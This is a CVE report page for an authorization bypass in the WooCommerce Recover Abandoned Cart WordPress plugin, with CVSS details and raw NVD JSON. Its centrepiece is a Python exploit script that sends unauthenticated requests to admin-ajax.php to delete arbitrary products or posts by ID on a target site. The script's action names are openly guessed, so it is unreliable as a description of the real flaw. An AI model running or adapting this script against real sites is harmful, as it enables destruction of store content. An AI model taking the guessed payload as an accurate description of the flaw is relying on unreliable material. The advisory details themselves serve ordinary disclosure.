Security Vulnerability Report
中文
CVE-2025-64222 CVSS 7.5 HIGH

CVE-2025-64222

Published: 2025-12-18 08:16:12
Last Modified: 2026-04-27 16:16:35

Description

Missing Authorization vulnerability in FantasticPlugins WooCommerce Recover Abandoned Cart rac allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WooCommerce Recover Abandoned Cart: from n/a through <= 24.6.0.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

WooCommerce Recover Abandoned Cart <= 24.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64222 PoC - WooCommerce Recover Abandoned Cart Authorization Bypass # Target: WordPress site with WooCommerce Recover Abandoned Cart plugin <= 24.6.0 import requests import sys TARGET_URL = "http://target-wordpress-site.com" def delete_woocommerce_content(post_id, content_type="product"): """ Exploit for Missing Authorization in WooCommerce Recover Abandoned Cart This PoC demonstrates how an unauthenticated user can delete arbitrary content """ # Common AJAX endpoint used by the plugin endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Try different action names used by the plugin action_names = [ "rac_delete", "rac_remove", "rac_ajax_delete", "rac_remove_from_abandoned", "rac_delete_abandoned_cart" ] for action in action_names: # Payload structure - varies depending on plugin version data = { "action": action, "rac_post_id": post_id, "rac_type": content_type, "security": "" # May be empty or weak validation } try: response = requests.post(endpoint, data=data, timeout=10) if response.status_code == 200: print(f"[*] Sent request with action: {action}") print(f"[*] Response: {response.text[:200]}") # Check for success indicators if any(keyword in response.text.lower() for keyword in ["success", "deleted", "removed"]): print(f"[!] Potential successful deletion of {content_type} ID: {post_id}") return True except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return False if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] TARGET_URL = target print("CVE-2025-64222 PoC - WooCommerce Recover Abandoned Cart Authorization Bypass") print("=" * 70) # Example: Try to delete product with ID 1 target_id = int(input("Enter target post/product ID to delete: ") or "1") delete_woocommerce_content(target_id, "product")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64222", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:12.033", "lastModified": "2026-04-27T16:16:35.397", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in FantasticPlugins WooCommerce Recover Abandoned Cart rac allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WooCommerce Recover Abandoned Cart: from n/a through <= 24.6.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/rac/vulnerability/wordpress-woocommerce-recover-abandoned-cart-plugin-24-6-0-arbitrary-content-deletion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}